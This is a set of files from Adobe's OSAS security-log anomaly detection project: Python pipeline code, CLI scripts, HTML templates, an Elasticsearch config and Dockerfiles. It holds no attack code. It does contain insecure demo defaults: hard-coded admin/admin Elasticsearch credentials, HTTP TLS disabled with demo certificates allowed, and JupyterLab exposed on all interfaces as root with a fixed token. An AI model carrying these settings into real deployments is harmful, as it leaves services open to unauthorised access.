14 |
28 |
29 |
30 |
31 |
--------------------------------------------------------------------------------
/CONTRIBUTING.md:
--------------------------------------------------------------------------------
1 | # Contributing
2 |
3 | Thanks for choosing to contribute!
4 |
5 | The following is a set of guidelines for contributing to this project.
6 |
7 | ## Code Of Conduct
8 |
9 | This project adheres to the Adobe [code of conduct](CODE_OF_CONDUCT.md). By participating, you are expected to uphold this code. Please report unacceptable behavior to Grp-opensourceoffice@adobe.com.
10 |
11 | ## Contributor License Agreement
12 |
13 | All third-party contributions to this project must be accompanied by a signed contributor license agreement. This gives Adobe permission to redistribute your contributions as part of the project. [Sign our CLA](http://opensource.adobe.com/cla.html). You only need to submit an Adobe CLA one time, so if you have submitted one previously, you are good to go!
14 |
15 | ## Code Reviews
16 |
17 | All submissions should come in the form of pull requests and need to be reviewed by project committers. Read [GitHub's pull request documentation](https://help.github.com/articles/about-pull-requests/) for more information on sending pull requests.
18 |
19 | Lastly, please follow the [pull request template](.github/PULL_REQUEST_TEMPLATE.md) when submitting a pull request!
20 |
--------------------------------------------------------------------------------
/setup.py:
--------------------------------------------------------------------------------
1 | import setuptools
2 | import os
3 |
4 | with open("README.md", "r", encoding="utf-8") as fh:
5 | long_description = fh.read()
6 |
7 | def parse_requirements(filename):
8 |     """Load requirements from a pip requirements file."""
9 |     with open(filename) as f:  # context manager so the file handle is closed
10 |         return [line.strip() for line in f if line.strip() and not line.strip().startswith("#")]
11 |
12 |
13 | setuptools.setup(
14 | name="osas",
15 | version="0.9.3",
16 | author="Multiple Authors",
17 | author_email="boros@adobe.com",
18 | description="One Stop Anomaly Shop",
19 | long_description=long_description,
20 | long_description_content_type="text/markdown",
21 | url="https://github.com/adobe/OSAS/",
22 | project_urls={
23 | "Source Code": "https://github.com/adobe/OSAS/",
24 | "Bug Tracker": "https://github.com/adobe/OSAS/issues",
25 | "Documentation": "https://github.com/adobe/OSAS/docs/"
26 | },
27 | classifiers=[
28 | "Programming Language :: Python :: 3.0",
29 | "License :: OSI Approved :: Apache Software License",
30 | "Operating System :: OS Independent",
31 | ],
32 | packages=setuptools.find_packages("src"),
33 | python_requires=">=3.10",
34 | include_package_data=True,
35 | install_requires=parse_requirements("requirements.txt"),
36 | package_dir={"": "src"},
37 | entry_points = {
38 | "console_scripts": [
39 | "osas = osas.cli:main"
40 | ]
41 | }
42 | )
43 |
--------------------------------------------------------------------------------
/src/osas/core/utils.py:
--------------------------------------------------------------------------------
1 | #
2 | # Authors: Security Intelligence Team within the Security Coordination Center
3 | #
4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
5 | #
6 | # Licensed under the Apache License, Version 2.0 (the "License");
7 | # you may not use this file except in compliance with the License.
8 | # You may obtain a copy of the License at
9 | #
10 | # http://www.apache.org/licenses/LICENSE-2.0
11 | #
12 | # Unless required by applicable law or agreed to in writing, software
13 | # distributed under the License is distributed on an "AS IS" BASIS,
14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15 | # See the License for the specific language governing permissions and
16 | # limitations under the License.
17 | #
18 |
19 | class Tokenizer:
20 | @staticmethod
21 | def tokenize(text, use_chars=False):
22 | if use_chars:
23 | return [ch for ch in text]
24 | else:
25 | toks = []
26 | tok = ''
27 | for ch in text:
28 | if not ch.isalnum() or ch == ' ':
29 | tok = tok.strip()
30 | if len(tok) != 0:
31 | toks.append(tok)
32 | tok = ''
33 | if ch != ' ':
34 | toks.append(ch)
35 | else:
36 | tok += ch
37 | if tok.strip() != '':
38 | toks.append(tok)
39 |
40 | return toks
41 |
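# Illustrative usage (not part of the original module): the word tokenizer keeps
# punctuation as separate tokens and drops whitespace, e.g.:
#
#   >>> Tokenizer.tokenize('user@host.com logged in')
#   ['user', '@', 'host', '.', 'com', 'logged', 'in']
#   >>> Tokenizer.tokenize('abc', use_chars=True)
#   ['a', 'b', 'c']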
--------------------------------------------------------------------------------
/src/osas/io_utils/formatter.py:
--------------------------------------------------------------------------------
1 | #
2 | # Authors: Security Intelligence Team within the Security Coordination Center
3 | #
4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
5 | #
6 | # Licensed under the Apache License, Version 2.0 (the "License");
7 | # you may not use this file except in compliance with the License.
8 | # You may obtain a copy of the License at
9 | #
10 | # http://www.apache.org/licenses/LICENSE-2.0
11 | #
12 | # Unless required by applicable law or agreed to in writing, software
13 | # distributed under the License is distributed on an "AS IS" BASIS,
14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15 | # See the License for the specific language governing permissions and
16 | # limitations under the License.
17 | #
18 |
19 | # object type conversion/formatting utility functions
20 | import ast
21 | import json
22 | import sys
23 |
24 |
25 | def eval_str(x):
26 | try:
27 | return ast.literal_eval(x)
28 | except Exception as e:
29 | fstr = 'osas/io_utils/formatter.py:eval_str()'
30 | print("[{}]Error--{}".format(fstr, e), file=sys.stderr)
31 |
32 |
33 | def dict_to_str(d):
34 | try:
35 | return json.dumps(d)
36 | except Exception as e:
37 | fstr = 'osas/io_utils/formatter.py:dict_to_str()'
38 | print("[{}]Error--{}".format(fstr, e), file=sys.stderr)
39 |
40 |
41 | def str_to_dict(s):
42 | try:
43 | return json.loads(s)
44 | except Exception as e:
45 | fstr = 'osas/io_utils/formatter.py:str_to_dict()'
46 | print("[{}]Error--{}".format(fstr, e), file=sys.stderr)
47 |
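# Illustrative usage (not part of the original module):
#
#   >>> dict_to_str({'a': 1})
#   '{"a": 1}'
#   >>> str_to_dict('{"a": 1}')
#   {'a': 1}
#   >>> eval_str("['x', 2]")
#   ['x', 2]
#
# On malformed input these helpers print the error to stderr and return None.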
--------------------------------------------------------------------------------
/src/osas/cli.py:
--------------------------------------------------------------------------------
1 | # Copyright 2024 Adobe. All rights reserved.
2 | # This file is licensed to you under the Apache License, Version 2.0 (the "License");
3 | # you may not use this file except in compliance with the License. You may obtain a copy
4 | # of the License at http://www.apache.org/licenses/LICENSE-2.0
5 |
6 | # Unless required by applicable law or agreed to in writing, software distributed under
7 | # the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR REPRESENTATIONS
8 | # OF ANY KIND, either express or implied. See the License for the specific language
9 | # governing permissions and limitations under the License.
10 |
11 | import os
12 | import os.path
13 | import sys
14 | import click
15 | from decouple import config
16 | import warnings
17 |
18 | warnings.filterwarnings("ignore", category=UserWarning)
19 | warnings.filterwarnings("ignore", category=DeprecationWarning)
20 | warnings.filterwarnings("ignore", category=Warning)
21 |
22 |
23 | def app_version(ctx, param, value):
24 | if not value or ctx.resilient_parsing:
25 | return
26 |
27 | from importlib.metadata import version
28 |
29 | osas_version = version("osas")
30 |
31 | click.echo(f"OSAS {osas_version}")
32 | ctx.exit()
33 |
34 |
35 | @click.group()
36 | @click.option(
37 | "--version",
38 | is_flag=True,
39 | callback=app_version,
40 | expose_value=False,
41 | is_eager=True,
42 | help="Show the version and exit.",
43 | )
44 | def main():
45 | pass
46 |
47 |
48 | @click.group()
49 | def ingest():
50 | pass
51 |
52 | if __name__ == "__main__":
53 | # disable all TQDM output
54 | main()
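# Illustrative usage, assuming the package is installed with the console_scripts
# entry point declared in setup.py ("osas = osas.cli:main"):
#
#   $ osas --version
#   OSAS <installed version>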
--------------------------------------------------------------------------------
/scripts/config/elasticsearch.yml:
--------------------------------------------------------------------------------
1 | opendistro_security.ssl.transport.pemcert_filepath: esnode.pem
2 | opendistro_security.ssl.transport.pemkey_filepath: esnode-key.pem
3 | opendistro_security.ssl.transport.pemtrustedcas_filepath: root-ca.pem
4 | opendistro_security.ssl.transport.enforce_hostname_verification: false
5 | opendistro_security.ssl.http.pemcert_filepath: esnode.pem
6 | opendistro_security.ssl.http.pemkey_filepath: esnode-key.pem
7 | opendistro_security.ssl.http.pemtrustedcas_filepath: root-ca.pem
8 | opendistro_security.allow_unsafe_democertificates: true
9 | opendistro_security.allow_default_init_securityindex: true
10 | opendistro_security.authcz.admin_dn:
11 | - CN=kirk,OU=client,O=client,L=test, C=de
12 |
13 | opendistro_security.audit.type: internal_elasticsearch
14 | opendistro_security.enable_snapshot_restore_privilege: true
15 | opendistro_security.check_snapshot_restore_write_privileges: true
16 | opendistro_security.restapi.roles_enabled: ["all_access", "security_rest_api_access"]
17 | opendistro_security.system_indices.enabled: true
18 | opendistro_security.system_indices.indices: [".opendistro-alerting-config", ".opendistro-alerting-alert*", ".opendistro-anomaly-results*", ".opendistro-anomaly-detector*", ".opendistro-anomaly-checkpoints", ".opendistro-anomaly-detection-state", ".opendistro-reports-*", ".opendistro-notifications-*", ".opendistro-notebooks", ".opendistro-asynchronous-search-response*"]
19 | cluster.routing.allocation.disk.threshold_enabled: false
20 | node.max_local_storage_nodes: 3
21 | path:
22 | data: /data/elastic/data
23 | logs: /data/elastic/logs
24 |
25 | opendistro_security.ssl.http.enabled: false
--------------------------------------------------------------------------------
/src/osas/pipeline/fetch_data.py:
--------------------------------------------------------------------------------
1 | #
2 | # Authors: Security Intelligence Team within the Security Coordination Center
3 | #
4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
5 | #
6 | # Licensed under the Apache License, Version 2.0 (the "License");
7 | # you may not use this file except in compliance with the License.
8 | # You may obtain a copy of the License at
9 | #
10 | # http://www.apache.org/licenses/LICENSE-2.0
11 | #
12 | # Unless required by applicable law or agreed to in writing, software
13 | # distributed under the License is distributed on an "AS IS" BASIS,
14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15 | # See the License for the specific language governing permissions and
16 | # limitations under the License.
17 | #
18 |
19 | import os
20 | import sys
21 |
22 | sys.path.append('')
23 |
24 | from src.osas.pipeline import Pipeline
25 | from osas.data import datasources
26 | from osas.core.interfaces import Datasource
27 | from osas.io_utils import config
28 |
29 |
30 | class FetchData(Pipeline):
31 | ''' class for data fetching '''
32 |
33 | def __init__(self, env: str):
34 | Pipeline.__init__(self, env)
35 | os.environ["UBA_ENV"] = env
36 |
37 | def datasource(self, name: str, load_config: str=None) -> Datasource:
38 | '''datasource generic method'''
39 | dsClass = getattr(sys.modules[datasources.__name__], name)
40 | # get args for datasource
41 | cfg = getattr(sys.modules[config.__name__], name)()
42 | if load_config:
43 | cfg.load(load_config)
44 | ds = dsClass(**(vars(cfg))) # convert obj to dict to kwargs
45 | return ds
46 |
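# Illustrative usage (the config path is an assumption; the datasource name must match
# both a class in osas.data.datasources and a config dataclass in osas.io_utils.config):
#
#   fd = FetchData('DEV')
#   ds = fd.datasource('CSVDataSource', load_config='tests/csv_datasource.conf')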
--------------------------------------------------------------------------------
/src/osas/templates/train_pipeline.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
Available datasets in tests folder:
11 | {%for i in range(0, len_dataset)%}
12 |
13 |
{{dataset[i]}}
14 | {%endfor%}
15 |
16 |
Available config in tests folder:
17 | {%for i in range(0, len)%}
18 |
19 |
{{files[i]}}
20 | {%endfor%}
21 |
22 |
Please input a valid config file from the list above
23 |
46 |
47 |
48 |
49 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | dist/
2 | build/
3 | tests/
4 | # Covers JetBrains IDEs: IntelliJ, RubyMine, PhpStorm, AppCode, PyCharm, CLion, Android Studio, WebStorm and Rider
5 | # Reference: https://intellij-support.jetbrains.com/hc/en-us/articles/206544839
6 | corpus/
7 | # User-specific stuff
8 | data
9 | .idea
10 | .idea/**/workspace.xml
11 | .idea/**/tasks.xml
12 | .idea/**/usage.statistics.xml
13 | .idea/**/dictionaries
14 | .idea/**/shelf
15 |
16 | # Generated files
17 | .idea/**/contentModel.xml
18 |
19 | # Sensitive or high-churn files
20 | .idea/**/dataSources/
21 | .idea/**/dataSources.ids
22 | .idea/**/dataSources.local.xml
23 | .idea/**/sqlDataSources.xml
24 | .idea/**/dynamic.xml
25 | .idea/**/uiDesigner.xml
26 | .idea/**/dbnavigator.xml
27 |
28 | # Gradle
29 | .idea/**/gradle.xml
30 | .idea/**/libraries
31 |
32 | # Gradle and Maven with auto-import
33 | # When using Gradle or Maven with auto-import, you should exclude module files,
34 | # since they will be recreated, and may cause churn. Uncomment if using
35 | # auto-import.
36 | # .idea/artifacts
37 | # .idea/compiler.xml
38 | # .idea/jarRepositories.xml
39 | # .idea/modules.xml
40 | # .idea/*.iml
41 | # .idea/modules
42 | # *.iml
43 | # *.ipr
44 |
45 | # CMake
46 | cmake-build-*/
47 |
48 | # Mongo Explorer plugin
49 | .idea/**/mongoSettings.xml
50 |
51 | # File-based project format
52 | *.iws
53 |
54 | # IntelliJ
55 | out/
56 |
57 | # mpeltonen/sbt-idea plugin
58 | .idea_modules/
59 |
60 | # JIRA plugin
61 | atlassian-ide-plugin.xml
62 |
63 | # Cursive Clojure plugin
64 | .idea/replstate.xml
65 |
66 | # Crashlytics plugin (for Android Studio and IntelliJ)
67 | com_crashlytics_export_strings.xml
68 | crashlytics.properties
69 | crashlytics-build.properties
70 | fabric.properties
71 |
72 | # Editor-based Rest Client
73 | .idea/httpRequests
74 |
75 | # Android studio 3.1+ serialized cache file
76 | .idea/caches/build_file_checksums.ser
77 | *.pyc
78 |
79 | *.DS_Store
80 | .DS_Store
81 |
82 | dist/
83 | osas.egg-info/
84 |
--------------------------------------------------------------------------------
/src/osas/pipeline/detect_anomalies.py:
--------------------------------------------------------------------------------
1 | #
2 | # Authors: Security Intelligence Team within the Security Coordination Center
3 | #
4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
5 | #
6 | # Licensed under the Apache License, Version 2.0 (the "License");
7 | # you may not use this file except in compliance with the License.
8 | # You may obtain a copy of the License at
9 | #
10 | # http://www.apache.org/licenses/LICENSE-2.0
11 | #
12 | # Unless required by applicable law or agreed to in writing, software
13 | # distributed under the License is distributed on an "AS IS" BASIS,
14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15 | # See the License for the specific language governing permissions and
16 | # limitations under the License.
17 | #
18 |
19 | import os
20 | import sys
21 |
22 | sys.path.append('')
23 |
24 | from osas.core import anomaly
25 | from osas.io_utils import config
26 | from osas.core.interfaces import AnomalyDetection, Datasource
27 |
28 |
29 | class DetectAnomalies():
30 | ''' class for anomalies detection wrapper methods '''
31 |
32 | def __init__(self, env: str = 'DEV'):
33 | os.environ["OSAS_ENV"] = env
34 |
35 | def detection_model(self, name: str, load_config: bool = False):
36 | '''get model specified by name'''
37 | # get anomaly detection type by name
38 | dmClass = getattr(sys.modules[anomaly.__name__], name)
39 | # get label gen obj
40 | dm = dmClass()
41 | return dm
42 |
43 | def build_model(self, model: AnomalyDetection, dataset: Datasource) -> dict:
44 | return model.build_model(dataset)
45 |
46 |     def get_scores(self, model: AnomalyDetection, dataset: Datasource) -> list[float]:
47 | return model.__call__(dataset)
48 |
49 | def get_pretrained_model(self, modelName: str, pretrained_data: str) -> AnomalyDetection:
50 | dmClass = getattr(sys.modules[anomaly.__name__], modelName)
51 | return dmClass.from_pretrained(pretrained_data)
52 |
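# Illustrative usage (the class-name placeholder and variable names are assumptions;
# the name must match a class exposed by osas.core.anomaly, and pretrained_json is the
# serialized 'scoring' section of a pretrained pipeline, as used in osas/api.py):
#
#   da = DetectAnomalies('DEV')
#   model = da.get_pretrained_model('<AnomalyModelClassName>', pretrained_json)
#   scores = da.get_scores(model, datasource)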
--------------------------------------------------------------------------------
/src/osas/templates/run_pipeline.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
Available datasets in tests folder:
11 | {%for i in range(0, len_dataset)%}
12 |
13 |
{{dataset[i]}}
14 | {%endfor%}
15 |
Available config in tests folder:
16 | {%for i in range(0, len)%}
17 |
{{files[i]}}
18 | {%endfor%}
19 |
Available pipelines in tests folder:
20 | {%for i in range(0, len_pipeline)%}
21 |
22 |
{{pipeline[i]}}
23 | {%endfor%}
24 |
Please input a valid config file from the list above
25 |
57 |
58 |
59 |
60 |
--------------------------------------------------------------------------------
/docker/osas-elastic/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM debian
2 | ENV APT_KEY_DONT_WARN_ON_DANGEROUS_USAGE=1
3 | RUN apt update && apt install -y gnupg2 curl procps openjdk-11-jdk unzip wget dbus sudo
4 |
5 | RUN wget -qO - https://d3g5vo6xdbdb9a.cloudfront.net/GPG-KEY-opendistroforelasticsearch | apt-key add -
6 | RUN echo "deb https://d3g5vo6xdbdb9a.cloudfront.net/apt stable main" | tee -a /etc/apt/sources.list.d/opendistroforelasticsearch.list
7 | RUN wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-oss-7.10.2-amd64.deb && \
8 | dpkg -i elasticsearch-oss-7.10.2-amd64.deb && \
9 | rm elasticsearch-oss-7.10.2-amd64.deb
10 |
11 | RUN curl https://d3g5vo6xdbdb9a.cloudfront.net/tarball/opendistro-elasticsearch/opendistroforelasticsearch-1.13.0-linux-x64.tar.gz -o opendistroforelasticsearch-1.13.0-linux-x64.tar.gz && \
12 | tar -zxf opendistroforelasticsearch-1.13.0-linux-x64.tar.gz && \
13 | rm opendistroforelasticsearch-1.13.0-linux-x64.tar.gz && \
14 | mv opendistroforelasticsearch-1.13.0 /elasticsearch && \
15 | chown elasticsearch:elasticsearch elasticsearch -R && \
16 | cd /elasticsearch && \
17 | sudo -H -u elasticsearch bash -c './opendistro-tar-install.sh &'
18 |
19 | RUN curl -fsSL https://artifacts.elastic.co/GPG-KEY-elasticsearch | apt-key add -
20 | RUN echo "deb https://artifacts.elastic.co/packages/7.x/apt stable main" | tee -a /etc/apt/sources.list.d/elastic-7.x.list
21 | RUN apt update
22 | RUN curl https://d3g5vo6xdbdb9a.cloudfront.net/tarball/opendistroforelasticsearch-kibana/opendistroforelasticsearch-kibana-1.13.0-linux-x64.tar.gz -o opendistroforelasticsearch-kibana-1.13.0-linux-x64.tar.gz && \
23 | tar -xf opendistroforelasticsearch-kibana-1.13.0-linux-x64.tar.gz && \
24 | rm opendistroforelasticsearch-kibana-1.13.0-linux-x64.tar.gz
25 |
26 | # Prepare environment UTF-8
27 | RUN apt-get update && DEBIAN_FRONTEND=noninteractive apt-get install -y locales python3 python3-pip mc nano htop git
28 | RUN sed -i -e 's/# en_US.UTF-8 UTF-8/en_US.UTF-8 UTF-8/' /etc/locale.gen && \
29 | locale-gen
30 | ENV LANG en_US.UTF-8
31 | ENV LANGUAGE en_US:en
32 | ENV LC_ALL en_US.UTF-8
33 |
34 | RUN echo "Cloning OSAS" && \
35 | cd / && \
36 | git clone https://github.com/adobe/OSAS.git && \
37 | mv OSAS osas
38 |
39 | RUN cd /osas/ && \
40 | pip3 install --no-cache-dir -r requirements.txt
41 |
42 |
43 | CMD /osas/scripts/run_services.sh & cd /osas && python3 osas/webserver.py
44 |
45 |
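# Illustrative build/run commands (image name and published ports are assumptions;
# Elasticsearch listens on 9200 and Kibana on 5601 by default):
#
#   docker build -t osas-elastic -f docker/osas-elastic/Dockerfile .
#   docker run -p 9200:9200 -p 5601:5601 osas-elastic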
--------------------------------------------------------------------------------
/docker/osas-elastic-jupyterlab/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM debian
2 | ENV APT_KEY_DONT_WARN_ON_DANGEROUS_USAGE=1
3 | RUN apt update && apt install -y gnupg2 curl procps openjdk-11-jdk unzip wget dbus sudo
4 | RUN DEBIAN_FRONTEND=noninteractive apt-get install -y locales python3 python3-pip mc nano htop git
5 |
6 | RUN wget -qO - https://d3g5vo6xdbdb9a.cloudfront.net/GPG-KEY-opendistroforelasticsearch | apt-key add -
7 | RUN echo "deb https://d3g5vo6xdbdb9a.cloudfront.net/apt stable main" | tee -a /etc/apt/sources.list.d/opendistroforelasticsearch.list
8 | RUN wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-oss-7.10.2-amd64.deb && \
9 | dpkg -i elasticsearch-oss-7.10.2-amd64.deb && \
10 | rm elasticsearch-oss-7.10.2-amd64.deb
11 |
12 | RUN curl https://d3g5vo6xdbdb9a.cloudfront.net/tarball/opendistro-elasticsearch/opendistroforelasticsearch-1.13.0-linux-x64.tar.gz -o opendistroforelasticsearch-1.13.0-linux-x64.tar.gz && \
13 | tar -zxf opendistroforelasticsearch-1.13.0-linux-x64.tar.gz && \
14 | rm opendistroforelasticsearch-1.13.0-linux-x64.tar.gz && \
15 | mv opendistroforelasticsearch-1.13.0 /elasticsearch && \
16 | chown elasticsearch:elasticsearch elasticsearch -R && \
17 | cd /elasticsearch && \
18 | sudo -H -u elasticsearch bash -c './opendistro-tar-install.sh &'
19 |
20 | RUN curl -fsSL https://artifacts.elastic.co/GPG-KEY-elasticsearch | apt-key add -
21 | RUN echo "deb https://artifacts.elastic.co/packages/7.x/apt stable main" | tee -a /etc/apt/sources.list.d/elastic-7.x.list
22 | RUN apt update
23 | RUN curl https://d3g5vo6xdbdb9a.cloudfront.net/tarball/opendistroforelasticsearch-kibana/opendistroforelasticsearch-kibana-1.13.0-linux-x64.tar.gz -o opendistroforelasticsearch-kibana-1.13.0-linux-x64.tar.gz && \
24 | tar -xf opendistroforelasticsearch-kibana-1.13.0-linux-x64.tar.gz && \
25 | rm opendistroforelasticsearch-kibana-1.13.0-linux-x64.tar.gz
26 |
27 | # Prepare environment UTF-8
28 | RUN sed -i -e 's/# en_US.UTF-8 UTF-8/en_US.UTF-8 UTF-8/' /etc/locale.gen && \
29 | locale-gen
30 | ENV LANG en_US.UTF-8
31 | ENV LANGUAGE en_US:en
32 | ENV LC_ALL en_US.UTF-8
33 |
34 | #RUN echo "Cloning OSAS" && \
35 | # cd / && \
36 | # git clone https://github.com/adobe/OSAS.git && \
37 | # mv OSAS osas
38 | ADD ./osas /osas/osas
39 | ADD ./docs /osas/docs
40 | ADD ./scripts /osas/scripts
41 | ADD ./resources /osas/resources
42 | RUN mkdir osas/corpus
43 | RUN mkdir osas/data
44 | COPY ./requirements.txt /osas/
45 |
46 | RUN cd /osas/ && \
47 | cat requirements.txt
48 |
49 | RUN cd /osas/ && \
50 | cat requirements.txt && \
51 | pip3 install -U pip && \
52 | pip3 install --no-cache-dir -r requirements.txt && \
53 | pip3 install jupyterlab
54 |
55 | ENV SHELL=/bin/bash
56 |
57 | CMD /osas/scripts/run_services.sh & jupyter lab --ip=0.0.0.0 --allow-root --ServerApp.token=osas # & cd /osas && python3 osas/webserver.py
58 |
59 |
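# Illustrative build/run commands (image name and port mapping are assumptions; the
# JupyterLab token is set to "osas" in the CMD above and Lab listens on 8888 by default;
# build from the repository root so the ADD/COPY paths above resolve):
#
#   docker build -t osas-elastic-jupyterlab -f docker/osas-elastic-jupyterlab/Dockerfile .
#   docker run -p 8888:8888 osas-elastic-jupyterlab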
--------------------------------------------------------------------------------
/src/osas/main/train_pipeline.py:
--------------------------------------------------------------------------------
1 | #
2 | # Authors: Security Intelligence Team within the Security Coordination Center
3 | #
4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
5 | #
6 | # Licensed under the Apache License, Version 2.0 (the "License");
7 | # you may not use this file except in compliance with the License.
8 | # You may obtain a copy of the License at
9 | #
10 | # http://www.apache.org/licenses/LICENSE-2.0
11 | #
12 | # Unless required by applicable law or agreed to in writing, software
13 | # distributed under the License is distributed on an "AS IS" BASIS,
14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15 | # See the License for the specific language governing permissions and
16 | # limitations under the License.
17 | #
18 |
19 | import optparse
20 | import sys
21 | import json
22 |
23 | sys.path.append('')
24 |
25 | from src.osas.pipeline import Pipeline
26 | from osas.data.datasources import CSVDataSource, Datasource
27 |
28 |
29 | def is_numeric(obj):
30 | attrs = ['__add__', '__sub__', '__mul__', '__truediv__', '__pow__']
31 | return all(hasattr(obj, attr) for attr in attrs)
32 |
33 |
34 | def process(params):
35 | # load and run pipeline
36 | datasource = CSVDataSource(params.input_file)
37 | p = Pipeline('DEV')
38 | p.load_config(params.conf_file)
39 | if params.incremental:
40 | p.load_model(params.orig_model_file)
41 | model = p.build_pipeline(datasource, incremental=params.incremental)
42 | json.dump(model, open(params.model_file, 'w'), indent=4)
43 |
44 |
45 | if __name__ == '__main__':
46 | parser = optparse.OptionParser()
47 | parser.add_option('--input-file', action='store', dest='input_file', help='location of the input file')
48 | parser.add_option('--conf-file', action='store', dest='conf_file', help='location of pipeline configuration file')
49 | parser.add_option('--model-file', action='store', dest='model_file',
50 | help='location where to store the pretrained pipeline file')
51 | parser.add_option('--orig-model-file', action='store', dest='orig_model_file',
52 |                   help='location of the original pretrained pipeline file (loaded when --incremental is used)')
53 | parser.add_option('--incremental', action='store_true', help='perform incremental update on the model (will load '
54 | '--orig-model-file and save at location specified by '
55 | '--model-file)')
56 |
57 | (params, _) = parser.parse_args(sys.argv)
58 |
59 | if params.input_file and params.conf_file and params.model_file:
60 | if params.incremental and params.orig_model_file:
61 | process(params)
62 | else:
63 | if params.incremental:
64 | print("Must specify --orig-model-file")
65 | elif params.orig_model_file:
66 | print("--orig-model-file must be used with --incremental")
67 | else:
68 | process(params)
69 | else:
70 | parser.print_help()
71 |
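# Illustrative invocation (file locations are assumptions; the module path follows the
# convention used in docs/RULES.md):
#
#   python osas/main/train_pipeline.py --input-file corpus/train.csv \
#       --conf-file tests/model.conf --model-file tests/model.json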
--------------------------------------------------------------------------------
/src/osas/main/run_pipeline.py:
--------------------------------------------------------------------------------
1 | #
2 | # Authors: Security Intelligence Team within the Security Coordination Center
3 | #
4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
5 | #
6 | # Licensed under the Apache License, Version 2.0 (the "License");
7 | # you may not use this file except in compliance with the License.
8 | # You may obtain a copy of the License at
9 | #
10 | # http://www.apache.org/licenses/LICENSE-2.0
11 | #
12 | # Unless required by applicable law or agreed to in writing, software
13 | # distributed under the License is distributed on an "AS IS" BASIS,
14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15 | # See the License for the specific language governing permissions and
16 | # limitations under the License.
17 | #
18 |
19 | import optparse
20 | import sys
21 | import json
22 | from elasticsearch import helpers, Elasticsearch
23 |
24 | sys.path.append('')
25 |
26 | from src.osas.pipeline import Pipeline
27 | from osas.data.datasources import CSVDataSource, Datasource
28 | import numpy as np
29 |
30 |
31 | def is_numeric(obj):
32 | attrs = ['__add__', '__sub__', '__mul__', '__truediv__', '__pow__']
33 | return all(hasattr(obj, attr) for attr in attrs)
34 |
35 |
36 | def process(params):
37 | # load and run pipeline
38 | datasource = CSVDataSource(params.input_file)
39 | p = Pipeline('DEV')
40 | p.load_config(params.conf_file)
41 | p.load_model(params.model_file)
42 | p(datasource)
43 | # save, if necessary
44 | if params.output_file:
45 | datasource.save(open(params.output_file, 'w'))
46 | # push to elasticsearch
47 | if not params.no_elastic:
48 | try:
49 | es = Elasticsearch([{'host': 'localhost', 'port': 9200}], http_auth=('admin', 'admin'))
50 | data = [item for item in datasource]
51 | for item in data:
52 | item['model'] = p._scoring_model_name
53 | item['raw'] = str(item['labels'])
54 | for key in item:
55 | if item[key] == 'NaN' or (is_numeric(item[key]) and np.isnan(item[key])):
56 | item[key] = None
57 | helpers.bulk(es, data, index="anomalies", doc_type="type")
58 | except Exception as e:
59 | sys.stdout.write('Unable to push data to ElasticSearch: {0}\n'.format(str(e)))
60 |
61 |
62 | if __name__ == '__main__':
63 | parser = optparse.OptionParser()
64 | parser.add_option('--input-file', action='store', dest='input_file', help='location of the input file')
65 | parser.add_option('--conf-file', action='store', dest='conf_file', help='location of pipeline configuration file')
66 | parser.add_option('--model-file', action='store', dest='model_file', help='location of pretrained pipeline file')
67 | parser.add_option('--output-file', action='store', dest='output_file', help='output-file (optional)')
68 | parser.add_option('--no-elastic', action='store_true', dest='no_elastic', help='don\'t push data to Elastic')
69 | (params, _) = parser.parse_args(sys.argv)
70 |
71 | if params.input_file and params.conf_file and params.model_file:
72 | if params.no_elastic and not params.output_file:
73 | sys.stdout.write("This run will not produce any results. You need to either specify --output-file or "
74 | "remove --no-elastic\n")
75 | else:
76 | process(params)
77 | else:
78 | parser.print_help()
79 |
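# Illustrative invocation (file locations are assumptions; the module path follows the
# convention used in docs/RULES.md):
#
#   python osas/main/run_pipeline.py --input-file corpus/events.csv \
#       --conf-file tests/model.conf --model-file tests/model.json \
#       --output-file corpus/events_scored.csv --no-elastic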
--------------------------------------------------------------------------------
/CODE_OF_CONDUCT.md:
--------------------------------------------------------------------------------
1 | # Adobe Code of Conduct
2 |
3 | ## Our Pledge
4 |
5 | In the interest of fostering an open and welcoming environment, we as
6 | contributors and maintainers pledge to making participation in our project and
7 | our community a harassment-free experience for everyone, regardless of age, body
8 | size, disability, ethnicity, gender identity and expression, level of experience,
9 | nationality, personal appearance, race, religion, or sexual identity and
10 | orientation.
11 |
12 | ## Our Standards
13 |
14 | Examples of behavior that contributes to creating a positive environment
15 | include:
16 |
17 | * Using welcoming and inclusive language
18 | * Being respectful of differing viewpoints and experiences
19 | * Gracefully accepting constructive criticism
20 | * Focusing on what is best for the community
21 | * Showing empathy towards other community members
22 |
23 | Examples of unacceptable behavior by participants include:
24 |
25 | * The use of sexualized language or imagery and unwelcome sexual attention or
26 | advances
27 | * Trolling, insulting/derogatory comments, and personal or political attacks
28 | * Public or private harassment
29 | * Publishing others' private information, such as a physical or electronic
30 | address, without explicit permission
31 | * Other conduct which could reasonably be considered inappropriate in a
32 | professional setting
33 |
34 | ## Our Responsibilities
35 |
36 | Project maintainers are responsible for clarifying the standards of acceptable
37 | behavior and are expected to take appropriate and fair corrective action in
38 | response to any instances of unacceptable behavior.
39 |
40 | Project maintainers have the right and responsibility to remove, edit, or
41 | reject comments, commits, code, wiki edits, issues, and other contributions
42 | that are not aligned to this Code of Conduct, or to ban temporarily or
